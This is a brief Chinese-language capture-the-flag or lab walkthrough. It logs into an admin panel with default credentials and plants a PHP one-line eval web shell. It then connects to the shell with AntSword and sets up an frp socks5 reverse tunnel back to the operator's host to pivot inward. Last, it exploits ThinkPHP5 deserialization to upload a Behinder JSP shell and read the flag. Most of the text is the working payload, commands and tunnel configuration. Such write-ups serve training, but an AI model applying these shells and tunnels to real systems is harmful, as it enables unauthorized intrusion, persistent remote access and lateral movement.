1.站点:10.225.91.13
访问网址:http://10.225.91.13/admin.php
输入管理员账号和密码(admin.php admin)
进入管理员界面,在资源管理中上传一句话木马
<?php @eval($_POST['403']);?>
获取文件上传路径,使用蚁剑进行连接,密码:403
蚁剑连接成功后在18目录下新建文件夹为zsm,配置frp
在frp-windows中配置
[common]
tls_enable = true
kcp_bind_port = 16100 #windows未被占用的端口
在frp-linux中配置
[common]
tls_enable = true
server_addr = 10.225.12.128 #本机端口
server_port = 16100 #windows配置中的端口
protocol = kcp
[16100]
type = tcp
plugin=socks5
remote_port = 16100 #未被占用端口
把frp-linux中frpc和frpc.ini文件上传进自己的文件夹
在蚁剑中开启终端 ,输入以下命令:
cd zsm #进入自己文件夹
ls #查看文件夹中的文件
chmod 777 frpc #开启权限
./frpc -c frpc.ini #开启服务
在frp-windows中命令行模式下,输入命令
frps.exe -c frps.ini #开启服务
配置Proxifier
点击确定,访问ip成功后,使用端口扫描器
得到网址靶机地址,thinkphp5上传jsp文件
在behinder的配置文件server中获取shell.jsp,复制文本进入thinkphp5反序列化工具,上传jsp文件,用冰蝎进行连接,连接成功即可获取flag